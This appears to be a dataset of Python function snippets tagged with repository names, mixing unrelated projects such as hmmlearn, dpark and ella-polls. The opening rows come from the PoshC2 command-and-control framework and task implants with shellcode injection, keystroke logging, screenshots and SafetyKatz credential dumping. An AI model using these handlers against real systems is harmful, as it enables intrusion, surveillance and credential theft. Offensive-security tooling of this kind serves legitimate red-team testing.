function stringlengths 11 56k | repo_name stringlengths 5 60 | features list |
|---|---|---|
def do_searchallhelp(user, command, randomuri):
searchterm = (command).replace("searchallhelp ", "")
for line in allhelp:
if searchterm in line.lower():
print(Colours.GREEN + line) | nettitude/PoshC2 | [
1460,
291,
1460,
19,
1532336012
] |
def do_upload_file(user, command, randomuri):
# TODO lots of common code
source = ""
destination = ""
if command == "upload-file":
style = Style.from_dict({
'': '#80d130',
})
session = PromptSession(history=FileHistory('%s/.upload-history' % PoshProjectDirectory), auto_suggest=AutoSuggestFromHistory(), style=style)
try:
source = session.prompt("Location file to upload: ", completer=FilePathCompleter(PayloadsDirectory, glob="*"))
source = PayloadsDirectory + source
except KeyboardInterrupt:
return
while not os.path.isfile(source):
print("File does not exist: %s" % source)
source = session.prompt("Location file to upload: ", completer=FilePathCompleter(PayloadsDirectory, glob="*"))
source = PayloadsDirectory + source
destination = session.prompt("Location to upload to: ")
else:
args = argp(command)
source = args.source
destination = args.destination
try:
destination = destination.replace("\\", "\\\\")
print("")
print("Uploading %s to %s" % (source, destination))
uploadcommand = f"upload-file {source} {destination}"
new_task(uploadcommand, user, randomuri)
except Exception as e:
print("Error with source file: %s" % e)
traceback.print_exc() | nettitude/PoshC2 | [
1460,
291,
1460,
19,
1532336012
] |
def do_migrate(user, command, randomuri):
params = re.compile("migrate", re.IGNORECASE)
params = params.sub("", command)
implant = get_implantdetails(randomuri)
implant_arch = implant.Arch
implant_comms = implant.Pivot
if implant_arch == "AMD64":
arch = "64"
else:
arch = "86"
if implant_comms == "C#":
path = "%sSharp_v4_x%s_Shellcode.bin" % (PayloadsDirectory, arch)
shellcodefile = load_file(path)
elif "Daisy" in implant_comms:
daisyname = input("Name required: ")
path = "%s%sSharp_v4_x%s_Shellcode.bin" % (PayloadsDirectory, daisyname, arch)
shellcodefile = load_file(path)
elif "Proxy" in implant_comms:
path = "%sProxySharp_v4_x%s_Shellcode.bin" % (PayloadsDirectory, arch)
shellcodefile = load_file(path)
new_task("run-exe Core.Program Core Inject-Shellcode %s%s #%s" % (base64.b64encode(shellcodefile).decode("utf-8"), params, os.path.basename(path)), user, randomuri) | nettitude/PoshC2 | [
1460,
291,
1460,
19,
1532336012
] |
def do_exit(user, command, randomuri):
return do_kill_implant(user, command, randomuri) | nettitude/PoshC2 | [
1460,
291,
1460,
19,
1532336012
] |
def do_stop_keystrokes(user, command, randomuri):
new_task("run-exe Logger.KeyStrokesClass Logger %s" % command, user, randomuri)
update_label("", randomuri) | nettitude/PoshC2 | [
1460,
291,
1460,
19,
1532336012
] |
def do_get_keystrokes(user, command, randomuri):
new_task("run-exe Logger.KeyStrokesClass Logger %s" % command, user, randomuri) | nettitude/PoshC2 | [
1460,
291,
1460,
19,
1532336012
] |
def do_get_screenshot(user, command, randomuri):
pwrStatus = get_powerstatusbyrandomuri(randomuri)
if (pwrStatus is not None and pwrStatus[7]):
ri = input("[!] Screen is reported as LOCKED, do you still want to attempt a screenshot? (y/N) ")
if ri.lower() == "n" or ri.lower() == "":
return
new_task(command, user, randomuri) | nettitude/PoshC2 | [
1460,
291,
1460,
19,
1532336012
] |
def do_stoppowerstatus(user, command, randomuri):
new_task(command, user, randomuri)
update_label("", randomuri) | nettitude/PoshC2 | [
1460,
291,
1460,
19,
1532336012
] |
def do_safetykatz(user, command, randomuri):
new_task("run-exe SafetyKatz.Program %s" % command, user, randomuri) | nettitude/PoshC2 | [
1460,
291,
1460,
19,
1532336012
] |
def do_loadmodule(user, command, randomuri):
params = re.compile("loadmodule ", re.IGNORECASE)
params = params.sub("", command)
check_module_loaded(params, randomuri, user) | nettitude/PoshC2 | [
1460,
291,
1460,
19,
1532336012
] |
def do_modulesloaded(user, command, randomuri):
implant_details = get_implantdetails(randomuri)
print(implant_details.ModsLoaded)
new_task("listmodules", user, randomuri) | nettitude/PoshC2 | [
1460,
291,
1460,
19,
1532336012
] |
def do_shell(user, command, randomuri):
new_task(command, user, randomuri) | nettitude/PoshC2 | [
1460,
291,
1460,
19,
1532336012
] |
def do_sharpwmi_execute(user, command, randomuri):
style = Style.from_dict({'': '#80d130'})
session = PromptSession(history=FileHistory('%s/.shellcode-history' % PoshProjectDirectory), auto_suggest=AutoSuggestFromHistory(), style=style)
try:
path = session.prompt("Location of base64 vbs/js file: ", completer=FilePathCompleter(PayloadsDirectory, glob="*.b64"))
path = PayloadsDirectory + path
except KeyboardInterrupt:
return
if os.path.isfile(path):
with open(path, "r") as p:
payload = p.read()
new_task("%s payload=%s" % (command, payload), user, randomuri)
else:
print_bad("Could not find file") | nettitude/PoshC2 | [
1460,
291,
1460,
19,
1532336012
] |
def do_fcomm_start(user, command, randomuri):
key = get_baseenckey()
if len(command.split()) == 1: # 'fcomm-connect' is one args
command = f"{command} {FCommFileName} {key}"
elif len(command.split()) == 2: # if the file name is already there then just add the key
command = f"{command} {key}"
else:
print_bad("Expected 'fcomm_connect' or 'fcomm_connect <filename>'")
return
new_task(command, user, randomuri) | nettitude/PoshC2 | [
1460,
291,
1460,
19,
1532336012
] |
def __init__(self, device, path_to_detector=None, verbose=False):
super(FolderDetector, self).__init__(device, verbose) | 1adrianb/face-alignment | [
6144,
1271,
6144,
68,
1505507564
] |
def detect_from_image(self, tensor_or_path):
# Only strings supported
if not isinstance(tensor_or_path, str):
raise ValueError | 1adrianb/face-alignment | [
6144,
1271,
6144,
68,
1505507564
] |
def reference_scale(self):
return 195 | 1adrianb/face-alignment | [
6144,
1271,
6144,
68,
1505507564
] |
def reference_x_shift(self):
return 0 | 1adrianb/face-alignment | [
6144,
1271,
6144,
68,
1505507564
] |
def _do_set_current_user(user_fun):
setattr(_thread_locals, USER_ATTR_NAME, user_fun.__get__(user_fun, local)) | PaesslerAG/django-currentuser | [
125,
35,
125,
14,
1491986156
] |
def __init__(self, get_response):
self.get_response = get_response | PaesslerAG/django-currentuser | [
125,
35,
125,
14,
1491986156
] |
def get_current_user():
current_user = getattr(_thread_locals, USER_ATTR_NAME, None)
if callable(current_user):
return current_user()
return current_user | PaesslerAG/django-currentuser | [
125,
35,
125,
14,
1491986156
] |
def __init__(self):
self._started = False
self.guides = {}
self.host = socket.gethostname()
self.guide_thread = None
self.guide_addr = None
self.register_addr = {}
self.ctx = zmq.Context() | douban/dpark | [
2692,
550,
2692,
1,
1334133306
] |
def start_guide(self):
sock = self.ctx.socket(zmq.REP)
port = sock.bind_to_random_port('tcp://0.0.0.0')
self.guide_addr = 'tcp://%s:%d' % (self.host, port)
def run():
logger.debug("guide start at %s", self.guide_addr)
while self._started:
if not sock.poll(1000, zmq.POLLIN):
continue
type_, msg = sock.recv_pyobj()
if type_ == GUIDE_STOP:
sock.send_pyobj(0)
break
elif type_ == GUIDE_GET_SOURCES:
uuid = msg
sources = None
if uuid in self.guides:
sources = self.guides[uuid]
else:
logger.warning('uuid %s NOT REGISTERED in guide server', uuid)
sock.send_pyobj(sources)
elif type_ == GUIDE_SET_SOURCES:
uuid, addr, bitmap = msg
if any(bitmap):
sources = None
if uuid in self.guides:
sources = self.guides[uuid]
if sources:
sources[addr] = bitmap
else:
self.guides[uuid] = {addr: bitmap}
self.register_addr[uuid] = addr
sock.send_pyobj(None)
elif type_ == GUIDE_REPORT_BAD:
uuid, addr = msg
sources = self.guides[uuid]
if addr in sources:
if addr != self.register_addr[uuid]:
del sources[addr]
else:
logger.warning('The addr %s to delete is the register Quit!!!', addr)
sock.send_pyobj(None)
else:
logger.error('Unknown guide message: %s %s', type_, msg)
sock.send_pyobj(None)
return spawn(run) | douban/dpark | [
2692,
550,
2692,
1,
1334133306
] |
def check_memory(location):
try:
import psutil
pid = os.getpid()
p = psutil.Process(pid)
rss = p.memory_info().rss >> 20
logger.info('memory rss %d MB in host %s at ',
rss, socket.gethostname(), location)
except ImportError:
logger.warning('import psutil failed') | douban/dpark | [
2692,
550,
2692,
1,
1334133306
] |
def __init__(self):
self._started = False
self.server_thread = None
self.download_threads = {}
self.uuid_state_dict = None
self.uuid_map_dict = None
self.guide_addr = None
self.server_addr = None
self.host = None
self.ctx = None
self.random_inst = None
self.master_broadcast_blocks = {} | douban/dpark | [
2692,
550,
2692,
1,
1334133306
] |
def start_server(self):
sock = self.ctx.socket(zmq.REP)
sock.setsockopt(zmq.LINGER, 0)
port = sock.bind_to_random_port("tcp://0.0.0.0")
server_addr = 'tcp://%s:%d' % (self.host, port)
guide_sock = self.ctx.socket(zmq.REQ)
guide_sock.setsockopt(zmq.LINGER, 0)
guide_sock.connect(self.guide_addr)
def run():
logger.debug("server started at %s", server_addr)
while self._started:
if not sock.poll(1000, zmq.POLLIN):
continue
type_, msg = sock.recv_pyobj()
logger.debug('server recv: %s %s', type_, msg)
if type_ == SERVER_STOP:
sock.send_pyobj(None)
break
elif type_ == SERVER_FETCH:
uuid, indices, client_addr = msg
if uuid in self.master_broadcast_blocks:
block_num = len(self.master_broadcast_blocks[uuid])
bls = []
for index in indices:
if index >= block_num:
logger.warning('input index too big %s for '
'len of blocks %d from host %s',
str(indices), block_num, client_addr)
sock.send_pyobj((SERVER_FETCH_FAIL, None))
else:
bls.append(self.master_broadcast_blocks[uuid][index])
sock.send_pyobj((SERVER_FETCH_OK, (indices, bls)))
elif uuid in self.uuid_state_dict:
fd = os.open(self.uuid_state_dict[uuid][0], os.O_RDONLY)
mmfp = mmap.mmap(fd, 0, access=ACCESS_READ)
os.close(fd)
bitmap = self.uuid_map_dict[uuid]
block_num = len(bitmap)
bls = []
for index in indices:
if index >= block_num:
logger.warning('input index too big %s for '
'len of blocks %d from host %s',
str(indices), block_num, client_addr)
sock.send_pyobj((SERVER_FETCH_FAIL, None))
else:
mmfp.seek(bitmap[index][0])
block = mmfp.read(bitmap[index][1])
bls.append(block)
mmfp.close()
sock.send_pyobj((SERVER_FETCH_OK, (indices, bls)))
else:
logger.warning('server fetch failed for uuid %s '
'not exists in server %s from host %s',
uuid, socket.gethostname(), client_addr)
sock.send_pyobj((SERVER_FETCH_FAIL, None))
elif type_ == DATA_GET:
uuid, compressed_size = msg
if uuid not in self.uuid_state_dict or not self.uuid_state_dict[uuid][1]:
if uuid not in self.download_threads:
sources = self._get_sources(uuid, guide_sock)
if not sources:
logger.warning('get sources from guide server failed in host %s',
socket.gethostname())
sock.send_pyobj(DATA_GET_FAIL)
continue
self.download_threads[uuid] = spawn(self._download_blocks,
*[sources, uuid, compressed_size])
sock.send_pyobj(DATA_DOWNLOADING)
else:
sock.send_pyobj(DATA_DOWNLOADING)
else:
sock.send_pyobj(DATA_GET_OK)
elif type_ == SERVER_CLEAR_ITEM:
uuid = msg
self.clear(uuid)
sock.send_pyobj(None)
else:
logger.error('Unknown server message: %s %s', type_, msg)
sock.send_pyobj(None)
sock.close()
logger.debug("stop Broadcast server %s", server_addr)
for uuid in list(self.uuid_state_dict.keys()):
self.clear(uuid)
return server_addr, spawn(run) | douban/dpark | [
2692,
550,
2692,
1,
1334133306
] |
def register_blocks(self, uuid, blocks):
if uuid in self.master_broadcast_blocks:
logger.warning('the block uuid %s exists in dict', uuid)
return
self.master_broadcast_blocks[uuid] = blocks
self.shared_master_blocks[uuid] = blocks | douban/dpark | [
2692,
550,
2692,
1,
1334133306
] |
def _update_sources(self, uuid, bitmap, source_sock):
try:
source_sock.send_pyobj((GUIDE_SET_SOURCES,
(uuid, self.server_addr, bitmap)))
source_sock.recv_pyobj()
except:
pass | douban/dpark | [
2692,
550,
2692,
1,
1334133306
] |
def _report_bad(addr):
logger.debug('fetch blocks failed from server %s', addr)
download_guide_sock.send_pyobj((GUIDE_REPORT_BAD, (uuid, addr)))
download_guide_sock.recv_pyobj() | douban/dpark | [
2692,
550,
2692,
1,
1334133306
] |
def clear(self, uuid):
if uuid in self.master_broadcast_blocks:
del self.master_broadcast_blocks[uuid]
del self.shared_master_blocks[uuid]
if uuid in self.uuid_state_dict:
del self.uuid_state_dict[uuid]
if uuid in self.shared_uuid_fn_dict:
del self.shared_uuid_fn_dict[uuid]
del self.shared_uuid_map_dict[uuid] | douban/dpark | [
2692,
550,
2692,
1,
1334133306
] |
def accumulate_list(l):
acc = 0
acc_l = []
for item in l:
acc_l.append(acc)
acc += item
acc_l.append(acc)
return acc_l | douban/dpark | [
2692,
550,
2692,
1,
1334133306
] |
def __init__(self):
self._started = False
self.guide_addr = None
self.download_addr = None
self.cache = None
self.shared_uuid_fn_dict = None
self.shared_uuid_map_dict = None
self.download_cond = None
self.ctx = None | douban/dpark | [
2692,
550,
2692,
1,
1334133306
] |
def register(self, uuid, value):
self.start()
if uuid in self.shared_uuid_fn_dict:
raise RuntimeError('broadcast %s has already registered' % uuid)
blocks, size, block_map = self.to_blocks(uuid, value)
_download_manager.register_blocks(uuid, blocks)
self._update_sources(uuid, block_map)
self.cache.put(uuid, value)
return size | douban/dpark | [
2692,
550,
2692,
1,
1334133306
] |
def clear(self, uuid):
assert self._started
self.cache.put(uuid, None)
sock = self.ctx.socket(zmq.REQ)
sock.connect(self.download_addr)
sock.send_pyobj((SERVER_CLEAR_ITEM, uuid))
sock.recv_pyobj()
sock.close() | douban/dpark | [
2692,
550,
2692,
1,
1334133306
] |
def _get_blocks_by_filename(file_name, block_map):
fp = open(file_name, 'rb')
buf = fp.read()
blocks = [buf[offset: offset + size] for offset, size in block_map]
fp.close()
return blocks | douban/dpark | [
2692,
550,
2692,
1,
1334133306
] |
def to_blocks(self, uuid, obj):
try:
if marshalable(obj):
buf = marshal.dumps((uuid, obj))
type_ = MARSHAL_TYPE
else:
buf = cPickle.dumps((uuid, obj), -1)
type_ = PICKLE_TYPE
except Exception:
buf = cPickle.dumps((uuid, obj), -1)
type_ = PICKLE_TYPE
checksum = binascii.crc32(buf) & 0xFFFF
stream = struct.pack(self.header_fmt, type_, checksum) + buf
blockNum = (len(stream) + (BLOCK_SIZE - 1)) >> BLOCK_SHIFT
blocks = [compress(stream[i * BLOCK_SIZE:(i + 1) * BLOCK_SIZE]) for i in range(blockNum)]
sizes = [len(block) for block in blocks]
size_l = accumulate_list(sizes)
block_map = list(izip(size_l[:-1], sizes))
return blocks, size_l[-1], block_map | douban/dpark | [
2692,
550,
2692,
1,
1334133306
] |
def shutdown(self):
if not self._started:
return
self._started = False | douban/dpark | [
2692,
550,
2692,
1,
1334133306
] |
def start_guide_manager():
_guide_manager.start() | douban/dpark | [
2692,
550,
2692,
1,
1334133306
] |
def stop_manager():
_manager.shutdown()
_download_manager.shutdown()
_guide_manager.shutdown()
env.environ.pop(GUIDE_ADDR, None)
env.environ.pop(DOWNLOAD_ADDR, None) | douban/dpark | [
2692,
550,
2692,
1,
1334133306
] |
def __init__(self, value):
assert value is not None, 'broadcast object should not been None'
self.uuid = str(uuid_pkg.uuid4())
self.value = value
self.compressed_size = _manager.register(self.uuid, self.value)
block_num = (self.compressed_size + BLOCK_SIZE - 1) >> BLOCK_SHIFT
self.bytes = block_num * BLOCK_SIZE
logger.info("broadcast %s in %d blocks, %d bytes", self.uuid, block_num, self.compressed_size) | douban/dpark | [
2692,
550,
2692,
1,
1334133306
] |
def __getstate__(self):
return self.uuid, self.compressed_size | douban/dpark | [
2692,
550,
2692,
1,
1334133306
] |
def __getattr__(self, name):
if name != 'value':
return getattr(self.value, name)
t = time.time()
value = _manager.fetch(self.uuid, self.compressed_size)
if value is None:
raise RuntimeError("fetch broadcast failed")
env.task_stats.secs_broadcast += time.time() - t
self.value = value
return value | douban/dpark | [
2692,
550,
2692,
1,
1334133306
] |
def __iter__(self):
return self.value.__iter__() | douban/dpark | [
2692,
550,
2692,
1,
1334133306
] |
def __contains__(self, item):
return self.value.__contains__(item) | douban/dpark | [
2692,
550,
2692,
1,
1334133306
] |
def __init__(self, base_estimator, n_estimators=10,
estimator_params=tuple()):
# Set parameters
self.base_estimator = base_estimator
self.n_estimators = n_estimators
self.estimator_params = estimator_params
# Don't instantiate estimators now! Parameters of base_estimator might
# still change. Eg., when grid-searching with the nested object syntax.
# This needs to be filled by the derived classes.
self.estimators_ = [] | psarka/uplift | [
33,
12,
33,
1,
1463903894
] |
def _make_estimator(self, append=True):
"""Make and configure a copy of the `base_estimator_` attribute.
Warning: This method should be used to properly instantiate new
sub-estimators.
"""
estimator = clone(self.base_estimator_)
estimator.set_params(**dict((p, getattr(self, p))
for p in self.estimator_params))
if append:
self.estimators_.append(estimator)
return estimator | psarka/uplift | [
33,
12,
33,
1,
1463903894
] |
def __getitem__(self, index):
"""Returns the index'th estimator in the ensemble."""
return self.estimators_[index] | psarka/uplift | [
33,
12,
33,
1,
1463903894
] |
def _partition_estimators(n_estimators, n_jobs):
"""Private function used to partition estimators between jobs."""
# Compute the number of jobs
n_jobs = min(_get_n_jobs(n_jobs), n_estimators)
# Partition estimators between jobs
n_estimators_per_job = (n_estimators // n_jobs) * np.ones(n_jobs,
dtype=np.int)
n_estimators_per_job[:n_estimators % n_jobs] += 1
starts = np.cumsum(n_estimators_per_job)
return n_jobs, n_estimators_per_job.tolist(), [0] + starts.tolist() | psarka/uplift | [
33,
12,
33,
1,
1463903894
] |
def __init__(self, repeat, n_iter, verbose):
self.repeat = repeat
self.n_iter = n_iter
self.verbose = verbose | hmmlearn/hmmlearn | [
2720,
721,
2720,
52,
1395570789
] |
def generate_training_sequences(self):
pass | hmmlearn/hmmlearn | [
2720,
721,
2720,
52,
1395570789
] |
def run(self, results_file):
runtimes = collections.defaultdict(dict)
sequences, lengths = self.generate_training_sequences()
for implementation in ["scaling", "log"]:
model = self.new_model(implementation)
LOG.info(f"{model.__class__.__name__}: testing {implementation}")
key = f"{model.__class__.__name__}|EM|hmmlearn-{implementation}"
elapsed = self.benchmark(sequences, lengths, model, key)
runtimes[key]["mean"] = elapsed.mean()
runtimes[key]["std"] = elapsed.std()
with open(results_file, mode="w") as fd:
fd.write("configuration,mean,std,n_iterations,repeat\n")
for key, value in runtimes.items():
fd.write(f"{key},{value['mean']},{value['std']},"
f"{self.n_iter},{self.repeat}\n") | hmmlearn/hmmlearn | [
2720,
721,
2720,
52,
1395570789
] |
def new_model(self, implementation):
return hmmlearn.hmm.GaussianHMM(
n_components=4,
n_iter=self.n_iter,
covariance_type="full",
implementation=implementation,
verbose=self.verbose
) | hmmlearn/hmmlearn | [
2720,
721,
2720,
52,
1395570789
] |
def log_one_run(self, start, end, model, tag):
super().log_one_run(start, end, model, tag)
LOG.info(f"means={model.means_}")
LOG.info(f"covars={model.covars_}") | hmmlearn/hmmlearn | [
2720,
721,
2720,
52,
1395570789
] |
def new_model(self, implementation):
return hmmlearn.hmm.MultinomialHMM(
n_components=3,
n_iter=self.n_iter,
verbose=self.verbose,
implementation=implementation
) | hmmlearn/hmmlearn | [
2720,
721,
2720,
52,
1395570789
] |
def log_one_run(self, start, end, model, tag):
super().log_one_run(start, end, model, tag)
LOG.info(f"emissions={model.emissionprob_}") | hmmlearn/hmmlearn | [
2720,
721,
2720,
52,
1395570789
] |
def generate_training_sequences(self):
sampler = hmmlearn.hmm.GaussianHMM(
n_components=4,
covariance_type="full",
init_params=""
)
sampler.startprob_ = np.asarray([0, 0, 0, 1])
sampler.transmat_ = np.asarray([
[.2, .2, .3, .3],
[.3, .2, .2, .3],
[.2, .3, .3, .2],
[.3, .3, .2, .2],
])
sampler.means_ = np.asarray([
[-1.5, 0],
[0, 0],
[1.5, 0],
[3, 0]
])
sampler.covars_ = np.asarray([
[[.5, 0],
[0, .5]],
[[.5, 0],
[0, 0.5]],
[[.5, 0],
[0, .5]],
[[0.5, 0],
[0, 0.5]],
])
observed, hidden = sampler.sample(50000)
lengths = [len(observed)]
return observed, lengths | hmmlearn/hmmlearn | [
2720,
721,
2720,
52,
1395570789
] |
def generate_training_sequences(self):
sampler = hmmlearn.hmm.GMMHMM(
n_components=4,
n_mix=3,
covariance_type="full",
init_params=""
)
sampler.startprob_ = [.25, .25, .25, .25]
sampler.transmat_ = [
[.1, .3, .3, .3],
[.3, .1, .3, .3],
[.3, .3, .1, .3],
[.3, .3, .3, .1],
]
sampler.weights_ = [
[.2, .2, .6],
[.6, .2, .2],
[.2, .6, .2],
[.1, .1, .8],
]
sampler.means_ = np.asarray([
[[-10], [-12], [-9]],
[[-5], [-4], [-3]],
[[-1.5], [0], [1.5]],
[[5], [7], [9]],
])
sampler.covars_ = np.asarray([
[[[.125]], [[.125]], [[.125]]],
[[[.125]], [[.125]], [[.125]]],
[[[.125]], [[.125]], [[.125]]],
[[[.125]], [[.125]], [[.125]]],
])
n_sequences = 10
length = 5_000
sequences = []
for i in range(n_sequences):
sequences.append(sampler.sample(5000)[0])
return np.concatenate(sequences), [length] * n_sequences | hmmlearn/hmmlearn | [
2720,
721,
2720,
52,
1395570789
] |
def log_one_run(self, start, end, model, tag):
super().log_one_run(start, end, model, tag)
LOG.info(f"weights_={model.weights_}") | hmmlearn/hmmlearn | [
2720,
721,
2720,
52,
1395570789
] |
def setup_all():
_.new_name = 'leño'
_.playlist_name = 'playlist'
_.existing_name = 'roña'
update_environment(_)
bootstrap_ipod(_.mountpoint_path)
create_playlist(_.mountpoint_path, _.playlist_name)
create_playlist(_.mountpoint_path, _.existing_name) | jvrsantacruz/ipodio | [
15,
1,
15,
9,
1371683448
] |
def should_print_an_error_():
execution = _.env.run(*_.cmd + ['playlist', 'rename', _.new_name, _.playlist_name])
expect(execution.stdout).to.have('does not exist') | jvrsantacruz/ipodio | [
15,
1,
15,
9,
1371683448
] |
def should_print_an_error__():
execution = _.env.run(*_.cmd + ['playlist', 'rename'], expect_error=True)
expect(execution.stderr).to.have('Usage:') | jvrsantacruz/ipodio | [
15,
1,
15,
9,
1371683448
] |
def should_print_an_error___():
execution = _.env.run(*_.cmd + ['playlist', 'rename', _.playlist_name, _.existing_name])
expect(execution.stdout).to.have('already exists') | jvrsantacruz/ipodio | [
15,
1,
15,
9,
1371683448
] |
def get_next_url(request):
"""
Return URL for redirection
Try to get it from:
* POST param 'next'
* HTTP_REFERER
"""
if 'next' in request.POST: # and request.POST['next'].startswith('/'):
return request.POST['next']
else:
return request.META.get('HTTP_REFERER', '/') | ella/ella-polls | [
3,
2,
3,
2,
1328022570
] |
def survey_check_vote(request, survey):
sess_jv = request.session.get(polls_settings.SURVEY_JUST_VOTED_COOKIE_NAME, [])
# removing just voted info from session
if survey.id in sess_jv:
del request.session[polls_settings.SURVEY_JUST_VOTED_COOKIE_NAME]
# TODO - del just my poll, not the entire list !
return polls_settings.USER_JUST_VOTED
# removing no vote info from session
sess_nv = request.session.get(polls_settings.SURVEY_NO_CHOICE_COOKIE_NAME, [])
if survey.id in sess_nv:
del request.session[polls_settings.SURVEY_NO_CHOICE_COOKIE_NAME]
# TODO - del just my poll, not the entire list !
return polls_settings.USER_NO_CHOICE
# authenticated user - check session
if request.user.is_authenticated():
sess = request.session.get(polls_settings.SURVEY_COOKIE_NAME, [])
if survey.id in sess:
return polls_settings.USER_ALLREADY_VOTED
# otherwise check Vote object - just for sure
if survey.check_vote_by_user(request.user):
return polls_settings.USER_ALLREADY_VOTED
return polls_settings.USER_NOT_YET_VOTED
# anonymous - check cookie
else:
cook = request.COOKIES.get(polls_settings.SURVEY_COOKIE_NAME, '').split(',')
if str(survey.id) in cook:
return polls_settings.USER_ALLREADY_VOTED
ip_address = request.META['REMOTE_ADDR']
# otherwise check Vote object - just for sure
if survey.check_vote_by_ip_address(ip_address):
return polls_settings.USER_ALLREADY_VOTED
return polls_settings.USER_NOT_YET_VOTED | ella/ella-polls | [
3,
2,
3,
2,
1328022570
] |
def poll_vote(request, poll_id):
poll_ct = ContentType.objects.get_for_model(Poll)
poll = get_cached_object_or_404(poll_ct, pk=poll_id)
url = get_next_url(request)
# activity check
if not poll.is_active():
return HttpResponseRedirect(url)
# vote check
if poll_check_vote(request, poll) != polls_settings.USER_NOT_YET_VOTED:
return HttpResponseRedirect(url)
form = QuestionForm(poll.question)(request.POST)
# invalid input
if not form.is_valid():
# no choice selected error - via session
sess_nv = request.session.get(polls_settings.POLL_NO_CHOICE_COOKIE_NAME, [])
sess_nv.append(poll.id)
request.session[polls_settings.POLL_NO_CHOICE_COOKIE_NAME] = sess_nv
return HttpResponseRedirect(url)
# vote save
kwa = {}
if request.user.is_authenticated():
kwa['user'] = request.user
kwa['ip_address'] = request.META['REMOTE_ADDR']
poll.vote(form.cleaned_data['choice'], **kwa)
# just voted info session update
sess_jv = request.session.get(polls_settings.POLL_JUST_VOTED_COOKIE_NAME, [])
sess_jv.append(poll.id)
request.session[polls_settings.POLL_JUST_VOTED_COOKIE_NAME] = sess_jv
response = HttpResponseRedirect(url)
# authenticated user vote - session update
if request.user.is_authenticated():
sess = request.session.get(polls_settings.POLL_COOKIE_NAME, [])
sess.append(poll.id)
request.session[polls_settings.POLL_COOKIE_NAME] = sess
# annonymous user vote - cookies update
else:
cook = request.COOKIES.get(polls_settings.POLL_COOKIE_NAME, '').split(',')
if len(cook) > polls_settings.POLL_MAX_COOKIE_LENGTH:
cook = cook[1:]
cook.append(str(poll.id))
expires = datetime.strftime(datetime.utcnow() + \
timedelta(seconds=polls_settings.POLL_MAX_COOKIE_AGE),
"%a, %d-%b-%Y %H:%M:%S GMT")
response.set_cookie(
polls_settings.POLL_COOKIE_NAME,
value=','.join(cook),
max_age=polls_settings.POLL_MAX_COOKIE_AGE,
expires=expires,
path='/',
domain=Site.objects.get_current().domain,
secure=None
)
return response | ella/ella-polls | [
3,
2,
3,
2,
1328022570
] |
def survey_vote(request, survey_id):
survey_ct = ContentType.objects.get_for_model(Survey)
survey = get_cached_object_or_404(survey_ct, pk=survey_id)
url = get_next_url(request)
# activity check
if not survey.current_activity_state == polls_settings.ACTIVITY_ACTIVE:
return HttpResponseRedirect(url)
# vote check
if survey_check_vote(request, survey) != polls_settings.USER_NOT_YET_VOTED:
return HttpResponseRedirect(url)
form = QuestionForm(survey)(request.POST)
# invalid input
if not form.is_valid():
# no choice selected error - via session
sess_nv = request.session.get(polls_settings.SURVEY_NO_CHOICE_COOKIE_NAME, [])
sess_nv.append(survey.id)
request.session[polls_settings.SURVEY_NO_CHOICE_COOKIE_NAME] = sess_nv
return HttpResponseRedirect(url)
# vote save
kwa = {}
if request.user.is_authenticated():
kwa['user'] = request.user
kwa['ip_address'] = request.META['REMOTE_ADDR']
survey.vote(form.cleaned_data['choice'], **kwa)
# just voted info session update
sess_jv = request.session.get(polls_settings.SURVEY_JUST_VOTED_COOKIE_NAME, [])
sess_jv.append(survey.id)
request.session[polls_settings.SURVEY_JUST_VOTED_COOKIE_NAME] = sess_jv
response = HttpResponseRedirect(url)
# authenticated user vote - session update
if request.user.is_authenticated():
sess = request.session.get(polls_settings.SURVEY_COOKIE_NAME, [])
sess.append(survey.id)
request.session[polls_settings.SURVEY_COOKIE_NAME] = sess
# annonymous user vote - cookies update
else:
cook = request.COOKIES.get(polls_settings.SURVEY_COOKIE_NAME, '').split(',')
if len(cook) > polls_settings.SURVEY_MAX_COOKIE_LENGTH:
cook = cook[1:]
cook.append(str(survey.id))
expires = datetime.strftime(datetime.utcnow() + timedelta(seconds=polls_settings.SURVEY_MAX_COOKIE_AGE), "%a, %d-%b-%Y %H:%M:%S GMT")
response.set_cookie(
polls_settings.SURVEY_COOKIE_NAME,
value=','.join(cook),
max_age=polls_settings.SURVEY_MAX_COOKIE_AGE,
expires=expires,
path='/',
domain=Site.objects.get_current().domain,
secure=None
)
return response | ella/ella-polls | [
3,
2,
3,
2,
1328022570
] |
def contest_vote(request, context):
contest = context['object']
forms = []
forms_are_valid = True
# question forms
for question in contest.questions:
form = QuestionForm(question)(request.POST or None, prefix=str(question.id))
if not form.is_valid():
forms_are_valid = False
forms.append((question, form))
# contestant form
initial = {}
if request.user.is_authenticated():
initial['name'] = request.user.first_name
initial['surname'] = request.user.last_name
initial['email'] = request.user.email
contestant_form = ContestantForm(request.POST or None, initial=initial)
if not contestant_form.is_valid():
forms_are_valid = False
# saving contestant
if forms_are_valid and contest.is_active():
return contest_finish(request, context, forms, contestant_form)
context.update({
'forms' : forms,
'contestant_form' : contestant_form,
'activity_not_yet_active' : polls_settings.ACTIVITY_NOT_YET_ACTIVE,
'activity_active' : polls_settings.ACTIVITY_ACTIVE,
'activity_closed' : polls_settings.ACTIVITY_CLOSED
})
return render_to_response(
get_templates_from_publishable('form.html', context['object']),
context,
context_instance=RequestContext(request)
) | ella/ella-polls | [
3,
2,
3,
2,
1328022570
] |
def render(self, name, value, attrs=None, choices=()):
if value is None: value = []
has_id = attrs and 'id' in attrs
final_attrs = self.build_attrs(attrs, name=name)
str_values = set([force_unicode(v) for v in value]) # Normalize to strings.
for i, (option_value, option_label) in enumerate(chain(self.choices, choices)):
# If an ID attribute was given, add a numeric index as a suffix,
# so that the checkboxes don't all have the same ID attribute.
if has_id:
final_attrs = dict(final_attrs, id='%s_%s' % (attrs['id'], i))
cb = forms.CheckboxInput(final_attrs, check_test=lambda value: value in str_values)
option_value = force_unicode(option_value)
yield mark_safe(u'<label>%s %s</label>' % (cb.render(name, option_value), force_unicode(option_label))) | ella/ella-polls | [
3,
2,
3,
2,
1328022570
] |
def render(self, name, value, attrs=None, choices=()):
return self.get_renderer(name, value, attrs, choices) | ella/ella-polls | [
3,
2,
3,
2,
1328022570
] |
def QuestionForm(question):
if question.allow_multiple:
choice_field = forms.ModelMultipleChoiceField(
queryset=question.choices,
widget=MyCheckboxSelectMultiple,
required=not question.allow_no_choice
)
else:
choice_field = forms.ModelChoiceField(
queryset=question.choices,
widget=MyRadioSelect,
empty_label=None,
required=not question.allow_no_choice
)
class _QuestionForm(forms.Form):
"""
Question form with all its choices
"""
choice = choice_field
def choices(self):
field = self['choice']
# TODO: move choice percentage to question and use it here!!
choice_list = fudge_choice_percentages(field.field.queryset)
for choice, input in zip(choice_list, field.as_widget(field.field.widget)):
